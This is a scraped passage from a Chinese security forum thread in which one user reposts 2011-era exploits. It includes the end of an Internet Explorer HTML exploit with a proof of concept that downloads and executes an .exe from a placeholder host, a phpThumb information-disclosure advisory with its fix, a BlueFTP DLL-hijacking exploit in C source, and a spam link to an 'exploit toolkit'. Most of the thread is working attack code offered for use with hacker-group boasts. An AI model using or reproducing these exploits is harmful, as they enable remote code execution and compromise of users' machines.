document.write(longunistring4); document.write(document.body.innerHTML); } var objectSource = boom(); </script> </head> <body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no"> <form id="objectDestination"></form></body> </html> #=======[ PoC (2) Download/Exec File]============> <html><head> <script src="res://mshtml.dll/objectembed.js"></script> <script language="javascript"> var objectSource = "http://[HOST]/{file}.exe.gif"; </script> </head> <body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no"> <form id="objectDestination"></form></body> </html> # Save Any HTML Code and Use him (Boom !! :D) <!-- #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... # Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org) # JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org) # www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ... #================================================================================================ --> |
| B10层 发表时间: 11-05-19 20:49 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
SEBUG-ID:20523 发布时间:2011-05-06 测试方法: [www.sebug.net] 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Exploit Title: phpThumb 'phpThumbDebug' Information Disclosure # Google Dork: inurl:phpThumb.php # Date: 06/05/2011 # Author: mook # Software Link: http://phpthumb.sourceforge.net/#download # Version: 1.7.9 # Tested on: linux Vulnerability: Information disclosure which includes absolute system paths, os flavour, application configuration information and other installed application versions. The vulnerability can be triggered by appending 'phpThumbDebug=" and any number from 0 to 10 to any phpThumb.php request. e.g: The response will be an image render of the debug information. Remediation: The responsible code can be found in phpThumb.php itself by changing the default "$PHPTHUMB_CONFIG['disable_debug'] = false;" to "$PHPTHUMB_CONFIG['disable_debug'] = true;".// sebug.net [2011-05-08] |
| B11层 发表时间: 11-05-19 20:50 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
BlueFTP 1.2 DLL Hijacking Exploit (ProfUIS250m.dll) |
| B12层 发表时间: 11-05-19 20:51 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # ======[ Exploit DLL C0de ====> /* ### # Title : BlueFTP 1.2 DLL Hijacking Exploit (ProfUIS250m.dll) # Author : KedAns-Dz # E-mail : ked-h@hotmail.com | ked-h@exploit-id.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Web Site : www.1337day.com / exploit-id.com # Twitter page : twitter.com/kedans # platform : Windows # Target : BlueFTP 1.2 # Tested on : Windows XP sp3 France ### 1. Compile dll 2. Replace 'BlueFTP 1.2' in 'BlueVoda Website Builder' directory with your newly compiled dll 3. Reboot or Startup BlueFTP 4. Boom calc! ### */ #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { Viva_Juventus(); } int Viva_Juventus() { WinExec("calc", 0); exit(0); return 0; } /* #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... # Exploit-Id Team : jos_ali_joe + kaMtiEz (exploit-id.com) ... All Others * TreX (hotturks.org) # JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org) # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... #================================================================================================ */ |
| B13层 发表时间: 11-05-19 20:52 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
EXPLOIT 工具包 多功能 http://auction1.paipai.com/14E8366C0000000000143AF40797F580 大家点啊,最拽的溢出工具包啊! [此贴被 DarK-Z(bridex) 在 05月19日20时59分 编辑过] |
| B14层 发表时间: 11-05-19 20:56 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
呵,你上当了~ |
| B15层 发表时间: 11-05-20 11:01 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: exploit专题!